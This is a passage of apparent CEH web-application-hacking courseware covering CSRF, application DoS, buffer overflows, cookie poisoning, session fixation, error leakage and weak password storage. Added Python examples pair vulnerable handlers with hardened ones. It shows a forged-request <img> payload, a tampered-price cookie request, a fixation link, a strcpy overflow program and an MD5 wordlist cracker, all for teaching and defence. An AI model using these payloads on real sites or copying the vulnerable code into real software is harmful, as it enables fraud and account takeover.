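Signatures like these are for triage and alerting, not for input filtering: the cheat sheet exists precisely because blacklists miss variants, so the fix in the application stays output encoding, and the detector's job is to tell you which paths and clients to look at.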
  • 73. Cross-Site Request Forgery (CSRF) Attack
Cross-Site Request Forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Diagram: User logs into the trusted site and creates a new session; the session identifier for the session is stored in a cookie in the web browser; the user visits a malicious website; the malicious website sends a request from the user's browser to the trusted website using his session cookie.
Cross-site Request Forgery (CSRF) Attack: Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the vulnerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually can't be accessed by outside attackers, so CSRF is one of the ways to get into the network. The inability of the web application to differentiate a request made by malicious code from a genuine request exposes it to CSRF attack. Cross-Site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend.
The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Module 13 Page 1795
  • 74. Diagram: User logs into the trusted site and creates a new session; the session identifier for the session is stored in a cookie in the web browser; the user visits a malicious website; the malicious website sends a request from the user's browser to the trusted website using his session cookie. FIGURE 13.23: Cross-site Request Forgery (CSRF) Attack
Module 13 Page 1796
  • 75. How CSRF Attacks Work
In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into clicking on a malicious link containing arbitrary code. When the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:
Module 13 Page 1797
  • 76. Server Code (Trusted Server):
<?php
session_start();
if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares'])) {
  buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
}
?>
Client Side Code:
<form action="buy.php" method="POST">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Shares: <input type="text" name="shares" /></p>
<p><input type="submit" value="Buy" /></p>
</form>
Malicious Code (Malicious Server):
<img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=1000" />
Steps: 1. User logs into the trusted server using his credentials. 2. Server sets a session cookie in the user's browser. 3. Attacker sends a phishing mail tricking the user into sending a request to a malicious site. 4. User requests a page from the malicious server. 5. Response page contains malicious code. 6. Malicious code is executed against the trusted server.
FIGURE 13.24: How CSRF Attacks Work
Module 13 Page 1798
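Added example (Python; not code from the EC-Council slides): the buy.php above places an order for any request that carries the session cookie, whether it came from the site's own form or from the <img> tag on the malicious page. The handler below reproduces that behaviour beside a hardened version that requires POST, checks the Origin header and verifies a per-session synchroniser token. The server secret, session id, origin and function names are constructed for the example; buy_stocks is a stand-in for the slide's function.

```python
import hashlib
import hmac
import secrets

# Added example (not from the CEH material): the slide's buy.php reworked in
# Python. The vulnerable handler honours any request that carries the session;
# the hardened one requires POST, an expected Origin and a per-session
# synchroniser token. Server secret, session id and origin are constructed.

SERVER_SECRET = secrets.token_bytes(32)       # constructed: one per deployment
ALLOWED_ORIGIN = "https://juggyboy.com"        # hypothetical origin of the site


def buy_stocks(symbol: str, shares: int) -> dict:
    """Stand-in for the slide's buy_stocks(): returns the order it would place."""
    return {"symbol": symbol, "shares": shares}


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session, so one minted in the attacker's own session is useless here."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_buy_vulnerable(session: dict, params: dict):
    """As buy.php on the slide: $_REQUEST accepts GET or POST, and the cookie is enough."""
    if "symbol" in params and "shares" in params:
        return buy_stocks(params["symbol"], int(params["shares"]))
    return None


def handle_buy_hardened(session: dict, method: str, params: dict, origin=None):
    """Reject the forged <img src=...> request while accepting the genuine form post."""
    if method != "POST":                       # the image trick can only issue GET
        return None
    if origin is not None and origin != ALLOWED_ORIGIN:
        return None                            # cross-site POST from the malicious page
    expected = issue_csrf_token(session["id"])
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return None                            # missing or wrong token: forged
    if "symbol" in params and "shares" in params:
        return buy_stocks(params["symbol"], int(params["shares"]))
    return None


if __name__ == "__main__":
    session = {"id": "sess-123"}                           # constructed session
    forged = {"symbol": "MSFT", "shares": "1000"}          # what the slide's <img> URL carries
    print("vulnerable:", handle_buy_vulnerable(session, forged))
    print("hardened, forged GET:", handle_buy_hardened(session, "GET", forged))
    legit = dict(forged, csrf_token=issue_csrf_token(session["id"]))
    print("hardened, genuine POST:", handle_buy_hardened(session, "POST", legit, ALLOWED_ORIGIN))
```

The genuine form must carry the token in a hidden field rendered by the server for this session; the malicious page cannot read it across origins, so it cannot forge a request that passes the check. A SameSite cookie attribute adds a browser-side layer on top of this.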
• 77. Web Application Denial-of-Service (DoS) Attack
Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

Why are applications vulnerable? The following issues make web applications vulnerable:
- Reasonable use expectations (the application is sized for the load a well-behaved user generates)
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Targets: in a web application denial-of-service attack the attacker tries to exhaust CPU, memory, sockets, disk bandwidth, database bandwidth, and worker processes.

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as those of legitimate clients, which makes them hard to detect with DoS protection measures that look only at packet rates or malformed traffic.

Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
• 78. - Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses
• 79. Denial-of-Service (DoS) Examples
Most web applications are designed to serve, or withstand, a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests to the web application until its resources are exhausted. Once the application has accepted enough of these requests it stops responding to other requests, even those sent by an authorized user, because the attacker's false requests crowd out the legitimate ones. Various web application DoS attacks include:

- User Registration DoS: The attacker could create a program that submits the registration form repeatedly, adding a large number of spurious users to the application.
- Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond.
- User Enumeration: If the application states which part of the username/password pair is incorrect, an attacker can automate the process of trying common usernames from a dictionary file to enumerate the users of the application.
• 80. - Account Lock-Out Attacks: Dictionary attacks can be limited by locking an account after a set number of failed attempts, but the lockout itself becomes a denial-of-service tool. The attacker may enumerate usernames through another vulnerability in the application and then attempt to authenticate to the site using valid usernames and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site.
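The user enumeration and account lock-out examples above, worked through as an added example that is not part of the original module: a Python model of a login endpoint that locks an account after five failures and tells the caller which half of the credential was wrong, beside a variant that throttles by source address with an escalating delay and returns one uniform message. The user table, passwords, IP addresses and the threshold are constructed for the demonstration.

```python
import hmac
import time
from collections import defaultdict

# Constructed credential table. A real store holds salted, slow hashes, not
# passwords; plaintext is used here only to keep the lockout logic visible.
USERS = {"alice": "correct horse", "bob": "battery staple"}
MAX_FAILURES = 5


def _credentials_match(user, password):
    expected = USERS.get(user)
    return expected is not None and hmac.compare_digest(expected.encode(), password.encode())


class LockoutLogin:
    """The slide's design: N wrong passwords lock the account, and the error
    text reveals whether the username or the password was wrong."""

    def __init__(self):
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, user, password, src_ip=None):
        if user in self.locked:
            return "account locked"
        if user not in USERS:
            return "unknown user"              # enumeration oracle
        if not _credentials_match(user, password):
            self.failures[user] += 1
            if self.failures[user] >= MAX_FAILURES:
                self.locked.add(user)          # attacker-triggerable denial of service
            return "wrong password"            # enumeration oracle
        return "ok"


class ThrottledLogin:
    """Hardened design: failures are counted per source address with an
    escalating delay, so knowing a victim's username is not enough to lock
    them out, and every failure returns the same message."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.src_failures = defaultdict(int)
        self.blocked_until = {}

    def login(self, user, password, src_ip):
        now = self.clock()
        if self.blocked_until.get(src_ip, 0.0) > now:
            return "too many attempts, retry later"
        if not _credentials_match(user, password):
            n = self.src_failures[src_ip] = self.src_failures[src_ip] + 1
            if n >= MAX_FAILURES:
                # 1, 2, 4, ... seconds, capped: slows a dictionary run from one source
                self.blocked_until[src_ip] = now + min(2 ** (n - MAX_FAILURES), 300)
            return "invalid username or password"
        self.src_failures[src_ip] = 0
        return "ok"


def demo(clock=lambda: 1000.0):
    """An attacker at 203.0.113.5 guesses alice's password five times, then
    alice (198.51.100.7) logs in with the right password. A fixed clock keeps
    the run deterministic. Returns both designs' outcomes."""
    attacker, alice = "203.0.113.5", "198.51.100.7"
    out = {}

    naive = LockoutLogin()
    for i in range(MAX_FAILURES):
        naive.login("alice", f"guess{i}", attacker)
    out["lockout_victim_login"] = naive.login("alice", "correct horse", alice)
    out["lockout_enumeration"] = (naive.login("mallory", "x", attacker),
                                  naive.login("bob", "x", attacker))

    hardened = ThrottledLogin(clock=clock)
    for i in range(MAX_FAILURES):
        hardened.login("alice", f"guess{i}", attacker)
    out["throttled_victim_login"] = hardened.login("alice", "correct horse", alice)
    out["throttled_attacker_next"] = hardened.login("alice", "guess5", attacker)
    out["throttled_enumeration"] = (hardened.login("mallory", "x", alice),
                                    hardened.login("bob", "x", alice))
    return out
```

Per-source throttling alone is weaker against a distributed attacker; production systems combine it with per-account soft measures (CAPTCHA, step-up verification, notification) rather than a hard lock that anyone can trigger.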
• 81. Buffer Overflow Attacks
A buffer has a specified data storage capacity, and if the data written exceeds that capacity the buffer overflows; that is, a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically buffers are sized to hold a finite amount of data; the extra data has to go somewhere, and it overflows into neighbouring memory, destroying or overwriting valid data.

Arbitrary Code
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, or modify internal variables. When a buffer overflows, the execution stack (or, for a heap buffer, adjacent heap data) of the web application is corrupted. An attacker can then send specially crafted input to the web application so that it executes the attacker's arbitrary code, allowing the attacker to take over the machine. Attackers overwrite function pointers or saved return addresses used by the application to redirect program execution, through a jump, call or return instruction, to a location in memory containing malicious code.

Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, the attacker who recognizes a potential buffer overflow in a widely used component gains access to a staggering array of products and deployments that embed it.

Vulnerable Code
The following program allocates a 10-byte heap buffer and copies the first command-line argument into it with strcpy(), which never checks the destination size. Any argument of 10 or more bytes (the terminating NUL needs one) overruns the allocation:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char *dest_buffer;

        dest_buffer = (char *) malloc(10);
        if (NULL == dest_buffer)
            return -1;

        if (argc > 1) {
            /* Unbounded copy: argv[1] may be far longer than 10 bytes. */
            strcpy(dest_buffer, argv[1]);
            printf("The first command-line argument is %s.\n", dest_buffer);
        } else {
            printf("No command-line argument was given.\n");
        }

        free(dest_buffer);
        return 0;
    }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.

• 82. Buffer Overflow Potential
Both the web application and the server products that provide the static or dynamic features of the site contain the potential for a buffer overflow error. Buffer overflow potential found in server products is commonly known (published in advisories) and creates a threat to every user of that product. When web applications use third-party libraries, they inherit any buffer overflow those libraries contain. Custom web application code may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected, and fewer attackers look for and develop exploits for such errors. If one is found in a custom application, the attacker's ability to do more than crash the application is reduced by the fact that neither the source code nor detailed error messages are accessible to the attacker.
• 83. Cookie/Session Poisoning
Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Cookies frequently carry sensitive credentials and, because they live on the client, can be modified with ease to escalate access or assume the identity of another user. Sessions are intended to be uniquely tied to the individual accessing the web application. Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored on a web user's computer) in order to bypass security mechanisms; poisoning of cookies and session information allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information. A proxy can be used to rewrite the session data, display the cookie data, and/or specify a new user ID or other session identifier in the cookie.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or on its hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer a "Remember me?" option and store the user's information in a cookie so that he or she does not have to re-enter the data on every visit; any private information entered is then stored in a cookie. In an attempt to protect cookies, site developers often encode them. Easily reversible encodings such as Base64 and ROT13 (rotating the letters of the alphabet by 13 positions) give many who view cookies a false sense of security: encoding is not encryption and provides no integrity protection.

• 84. Threats
The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account and assume the identity of other users of an application. By assuming another user's online identity, the attacker can review the original user's purchase history, order new items, and exploit whatever services and access the vulnerable web application provides. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie.

Cookies can be persistent or non-persistent and secure or non-secure, so a given cookie is one of four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies (those carrying the Secure attribute) are transferred only over SSL/TLS connections.
• 85. How Cookie Poisoning Works
Cookies are mainly used by web applications to simulate a stateful experience for the end user; the server-side components use them to recognize who is making each request. A web server sets a cookie with a Set-Cookie header on any response, the browser stores it on the user's computer, and every subsequent request to that server carries the cookie in a Cookie header. To provide further functionality, cookies can also be read and modified by JavaScript in the page. This attack alters the value of a cookie on the client side before the request is sent to the server: the attacker obtains the user's cookies (by sniffing, XSS, or phishing), modifies the cookie parameters, and submits the request to the web server, which accepts and processes it because it trusts what the client sent.

• 86. The following diagram explains the process of a cookie poisoning attack (FIGURE 13.25: How Cookie Poisoning Works):

Step 1: the user browses a web page; the web server replies with the requested page and sets a cookie in the user's browser. The checkout request as the user's browser sends it:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

Step 2: the attacker steals the cookie (sniffing, XSS, phishing attack).

Step 3: the attacker orders the product using a modified cookie, changing only the client-held TotalPrice field:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

Step 4: the product is delivered to the attacker's address. The server charged the price it was told rather than the price it computed, because the cookie carried business data with no integrity protection.
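The exchange in Figure 13.25, worked through as an added example that is not part of the original module: a Python model of a checkout that trusts the TotalPrice field in the cookie, beside one that signs the cookie with an HMAC and recomputes the total from the item IDs against the server's own catalogue. The item prices and the server key are constructed for the demonstration; the cookie fields come from the slide. The example also shows why Base64-encoding the cookie adds no protection.

```python
import base64
import hashlib
import hmac
import secrets

# Assumed server-side secret; never leaves the server.
SERVER_KEY = secrets.token_bytes(32)
# Constructed catalogue: item ID -> unit price. The three items sum to the
# slide's TotalPrice of 11568.
CATALOG = {1258: 2500, 2658: 4568, 6652: 4500}

COOKIE_FROM_SLIDE = ("SESSIONID=325896ASDD23SA3587; BasketSize=3; "
                     "Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568")


def parse_cookie(header):
    """'a=1; b=2;' -> {'a': '1', 'b': '2'} (trailing ';' tolerated)."""
    pairs = (p.strip() for p in header.split(";") if p.strip())
    return dict(p.split("=", 1) for p in pairs)


def checkout_vulnerable(cookie_header):
    """Charges whatever the client says the total is."""
    return int(parse_cookie(cookie_header)["TotalPrice"])


def sign_cookie(body):
    """body -> 'body|hexmac'. Integrity only: the body stays readable."""
    mac = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{mac}"


def verify_cookie(signed):
    """Returns the body if the MAC checks out, else None."""
    body, sep, mac = signed.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return body if hmac.compare_digest(mac, expected) else None


def checkout_hardened(signed_cookie):
    """Rejects any cookie that fails the MAC, and even then ignores TotalPrice:
    the amount is derived from the item IDs against the server's catalogue.
    Returns the amount charged, or None if the request is refused."""
    body = verify_cookie(signed_cookie)
    if body is None:
        return None
    c = parse_cookie(body)
    items = [int(v) for k, v in c.items() if k.startswith("Item")]
    if len(items) != int(c.get("BasketSize", -1)) or any(i not in CATALOG for i in items):
        return None
    return sum(CATALOG[i] for i in items)


def demo():
    out = {}
    tampered = COOKIE_FROM_SLIDE.replace("TotalPrice=11568", "TotalPrice=100")
    out["vulnerable_honest"] = checkout_vulnerable(COOKIE_FROM_SLIDE)
    out["vulnerable_tampered"] = checkout_vulnerable(tampered)

    # "Encoding" the cookie changes nothing: the attacker decodes, edits, re-encodes.
    encoded = base64.b64encode(COOKIE_FROM_SLIDE.encode()).decode()
    edited = base64.b64decode(encoded).decode().replace("TotalPrice=11568", "TotalPrice=100")
    re_encoded = base64.b64encode(edited.encode()).decode()
    out["vulnerable_base64_tampered"] = checkout_vulnerable(base64.b64decode(re_encoded).decode())

    signed = sign_cookie(COOKIE_FROM_SLIDE)
    out["hardened_honest"] = checkout_hardened(signed)
    out["hardened_tampered"] = checkout_hardened(signed.replace("TotalPrice=11568", "TotalPrice=100"))
    # Even a server-signed body with a stale total is recomputed, not believed.
    out["hardened_signed_wrong_total"] = checkout_hardened(sign_cookie(tampered))
    return out
```

The simplest fix is not to put prices in the cookie at all: keep the basket server-side keyed by the session ID. Where client-held state is unavoidable, sign it (or use authenticated encryption if it must also be confidential) and still treat any business value in it as a hint, never as the authority.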
• 87. Session Fixation Attack
In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value chosen by the attacker. The attacker then assumes the identity of the victim and exploits his credentials at the server. Session fixation helps an attacker hijack a valid user session: the attacker first obtains a session ID the server will accept, then lures the victim into using that same session ID. If the victim authenticates in the session the attacker chose, the attacker, who already knows the session ID, now holds a session the server treats as the victim's. The attack works against servers that accept a session ID supplied by the client (for example in the URL) and keep the same ID across the login. The session fixation attack procedure is explained with the help of the following diagram (FIGURE 13.26: Session Fixation Attack), with the server at juggybank.com:

(1) The attacker logs on to the bank website using his own credentials. (2) The web server sets a session ID on the attacker's machine. (3) The attacker sends the user an email containing a link with the fixed session ID: http://juggybank.com/login.jsp?sessionid=4321 (4) The user clicks on the link and is redirected to the bank website. (5) The user logs in to the server using his own credentials and the fixed session ID. (6) The attacker accesses the server with the same session ID and is now treated as the victim.
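The flow in Figure 13.26, worked through as an added example that is not part of the original module: a Python session store that, in its vulnerable configuration, adopts a client-supplied session ID (the ?sessionid=4321 from the slide) and keeps it across login, beside a hardened configuration that honours only IDs it issued itself and regenerates the ID when the user authenticates. The store and user names are constructed for the demonstration.

```python
import secrets


class SessionStore:
    """hardened=False reproduces the vulnerable server from the slide;
    hardened=True applies the two fixes that defeat fixation."""

    def __init__(self, hardened):
        self.hardened = hardened
        self.sessions = {}          # session ID -> {"user": name or None}

    def _new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def begin(self, presented_sid=None):
        """Called when a request arrives with (or without) a session ID, here
        taken from the URL as in http://juggybank.com/login.jsp?sessionid=4321.
        Returns the session ID the server will use for this client."""
        if presented_sid in self.sessions:
            return presented_sid                  # known ID: resume it
        if presented_sid is not None and not self.hardened:
            # Vulnerable: adopt whatever ID the client proposed.
            self.sessions[presented_sid] = {"user": None}
            return presented_sid
        # Hardened: unknown or absent ID -> issue a fresh, server-chosen one.
        return self._new_session()

    def login(self, sid, user, password_ok=True):
        """Authenticate in session `sid`. Returns the session ID the client
        must use from now on, or None if login failed."""
        if not password_ok or sid not in self.sessions:
            return None
        if self.hardened:
            # Privilege changed: retire the pre-login ID so anyone who knew it
            # (the attacker who fixed it) is left holding a dead session.
            del self.sessions[sid]
            sid = self._new_session()
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, sid):
        sess = self.sessions.get(sid)
        return sess["user"] if sess else None


def fixation_attack(hardened):
    """Replays steps 1-6 of the diagram against a store of the given kind.
    Returns what the attacker sees when replaying the fixed ID afterwards,
    who the victim is logged in as, and whether the victim kept the fixed ID."""
    store = SessionStore(hardened)
    fixed = "4321"                                   # ID the attacker puts in the link
    store.begin(fixed)                               # attacker primes it (ignored when hardened)
    victim_sid = store.begin(fixed)                  # victim follows the link
    victim_sid = store.login(victim_sid, "victim")   # victim logs in with real credentials
    return {
        "attacker_sees": store.whoami(fixed),        # attacker replays sessionid=4321
        "victim_logged_in_as": store.whoami(victim_sid),
        "victim_kept_fixed_id": victim_sid == fixed,
    }
```

Regenerating the ID at login is the essential fix; refusing client-proposed IDs and carrying the ID only in a cookie (not the URL) remove the channels the attacker uses to plant it.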
• 88. Insufficient Transport Layer Protection
Insufficient transport layer protection means the site supports weak protocols or algorithms, uses expired or invalid certificates, or fails to protect part of the traffic (for example encrypting the login page but sending the session cookie in clear text afterwards). A weak or misconfigured SSL/TLS setup also helps the attacker launch phishing and man-in-the-middle (MITM) attacks. This vulnerability exposes users' data to untrusted third parties and can lead to account theft.

SSL/TLS must protect every request that carries credentials or a session cookie, not only the login itself; otherwise an attacker on the network path can monitor traffic and steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted and authenticated, or data can be intercepted, injected, or redirected. Account theft, phishing attacks, and compromise of administrative accounts may follow.
• 89. Improper Error Handling
Improper error handling gives insight into the application's internals, such as logic flaws, default accounts, database structure, and file system layout. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. The slide shows a forum page at juggyboy.com that returns a raw debug error to the browser; in substance the screenshot reads:

    General Error
    Could not obtain post/user information
    DEBUG MODE
    SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
    SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = '1547' AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
    Line: 435
    File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php

A single message discloses the database engine (MySQL MyISAM file names), table and column names, the exact query shape (directly useful for SQL injection), the forum software in use, and an absolute path on the server.

Improper error handling may result in various security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. It may allow an attacker to gather information such as:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
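The leak shown above, as an added example that is not part of the original module: a Python request handler that returns the raw exception and stack trace to the client, beside one that logs the details server-side under a reference ID and returns only a generic message, plus a small checker of the kind a tester runs over responses to flag this class of disclosure. The simulated database error reuses the table name from the slide; the handler, logger set-up and detection patterns are constructed.

```python
import logging
import re
import traceback
import uuid
from io import StringIO

# Patterns a tester looks for in a response body: SQL text, database error
# prefixes, stack-trace markers and absolute server paths.
LEAK_PATTERNS = {
    "sql_statement": re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b.+\bFROM\b", re.I),
    "db_error": re.compile(r"(SQL Error|ORA-\d{5}|SQLSTATE|You have an error in your SQL syntax)", re.I),
    "stack_trace": re.compile(r'(Traceback \(most recent call last\)|File ".*", line \d+|\bat [\w.$]+\(\w+\.java:\d+\))'),
    "server_path": re.compile(r"/(?:usr|home|var|opt|srv)/[\w./-]+"),
}


def find_leaks(body):
    """Returns the sorted names of disclosure categories found in a response body."""
    return sorted(name for name, rx in LEAK_PATTERNS.items() if rx.search(body))


def load_topic(topic_id):
    """Stand-in for the data layer. Raises the kind of error the slide's
    screenshot shows reaching the browser (constructed message)."""
    raise RuntimeError(
        "SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145) "
        f"SELECT pt.post_text FROM nuke_bbposts_text pt WHERE pt.post_id = {int(topic_id)}"
    )


def view_topic_leaky(topic_id):
    """Debug-mode behaviour: everything the developer would want, sent to the attacker."""
    try:
        return load_topic(topic_id)
    except Exception as exc:
        return f"General Error\n{exc}\n{traceback.format_exc()}"


def view_topic_safe(topic_id, log):
    """Fail closed: full detail to the server log under a reference ID; the
    client gets only the reference, so support can correlate without disclosure."""
    try:
        return load_topic(topic_id)
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s topic_id=%r\n%s", ref, topic_id, traceback.format_exc())
        return f"An internal error occurred. Reference: {ref}"


def demo():
    """Serves the slide's topic 1547 through both handlers and inspects what
    each one sent to the client and what reached the log."""
    buf = StringIO()
    log = logging.getLogger("webapp.errors.demo")
    log.handlers.clear()
    log.propagate = False
    log.addHandler(logging.StreamHandler(buf))
    log.setLevel(logging.ERROR)

    leaky = view_topic_leaky(1547)
    safe = view_topic_safe(1547, log)
    return {
        "leaky_leaks": find_leaks(leaky),
        "safe_leaks": find_leaks(safe),
        "detail_in_log": "nuke_bbposts_text" in buf.getvalue(),
        "safe_response": safe,
    }
```

In a real deployment the generic handler is installed once at the framework level (an error page or middleware) so that no code path can fall through to the platform's default debug output; the checker belongs in the test suite or a DAST scan, run against every error-inducing input.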
• 90. Insecure Cryptographic Storage
Web applications use cryptographic algorithms to protect their data and other sensitive information that is stored or transferred between server and client. Insecure cryptographic storage refers to the state of an application that uses poorly written or poorly chosen cryptographic code (weak algorithms, home-grown ciphers, hard-coded keys, unsalted fast hashes, or reversible encoding presented as encryption) to store sensitive data in the database. Such data can be recovered and modified by an attacker who obtains the stored records, yielding confidential information such as credit card numbers, passwords, SSNs, and other authentication credentials that were never protected with appropriate encryption or hashing, and enabling identity theft, credit card fraud, or other crimes. Developers avoid these attacks by using well-reviewed standard algorithms and libraries with properly managed keys to encrypt sensitive data, and salted, slow password hashing rather than encryption for credentials. The following pictorial representation shows vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
• 91. FIGURE 13.27: Insecure Cryptographic Storage
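The comparison Figure 13.27 alludes to, as an added example that is not part of the original module: Python password storage done the insecure way (reversible Base64 presented as encryption, and an unsalted MD5 hash that is identical for every user with the same password and falls to a wordlist) beside the secure way (a random per-user salt and a slow key-derivation function, PBKDF2-HMAC-SHA256 from the standard library, verified in constant time). The password, wordlist and iteration count are constructed.

```python
import base64
import hashlib
import hmac
import os

# --- Insecure storage: what "poorly written encryption code" tends to be ---

def store_base64(password):
    """Encoding mistaken for encryption: anyone holding the database reverses it."""
    return base64.b64encode(password.encode()).decode()


def recover_base64(stored):
    return base64.b64decode(stored).decode()


def store_md5(password):
    """Fast, unsalted hash: equal passwords give equal digests, and a
    precomputed table or a quick wordlist run recovers them."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(digest, wordlist):
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


# --- Secure storage: salted, slow, self-describing record ---

PBKDF2_ITERATIONS = 600_000      # assumed work factor; tune to ~100 ms on the server


def store_pbkdf2(password, iterations=PBKDF2_ITERATIONS):
    """Returns 'pbkdf2_sha256$<iterations>$<salt_b64>$<hash_b64>'. The record
    carries its own parameters so the work factor can be raised later per user."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_pbkdf2(password, record):
    """Recomputes with the stored salt and parameters; rejects malformed records."""
    try:
        algo, iterations, salt_b64, hash_b64 = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(hash_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(dk, expected)


def demo():
    """Two users pick the same weak password; an attacker dumps the table."""
    wordlist = ["123456", "password", "letmein", "qwerty"]     # constructed
    pw = "letmein"
    out = {}
    out["base64_recovered"] = recover_base64(store_base64(pw))
    a, b = store_md5(pw), store_md5(pw)
    out["md5_identical_for_same_password"] = a == b
    out["md5_cracked"] = crack_md5(a, wordlist)
    ra, rb = store_pbkdf2(pw), store_pbkdf2(pw)
    out["pbkdf2_identical_for_same_password"] = ra == rb
    out["pbkdf2_verify_correct"] = verify_pbkdf2(pw, ra)
    out["pbkdf2_verify_wrong"] = verify_pbkdf2("letmein1", ra)
    return out
```

Passwords are hashed, not encrypted, because the server never needs the plaintext back. Data the server must read again (card numbers, SSNs) is the encryption case, and there the pitfalls are key management and unauthenticated modes rather than the hash choice.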
• 92. Broken Authentication and Session Management
An attacker uses vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, "remember me", secret question, account update, and others, to impersonate users.

Authentication and session management includes every aspect of user authentication and managing active sessions. Even otherwise solid authentication fails when the surrounding credential functions, such as password change, forgot-my-password, remember-my-password, and account update, are weak. Utmost care has to be taken with user authentication; it is always better to use strong authentication methods through software- and hardware-based cryptographic tokens or biometrics.

Session ID in URLs
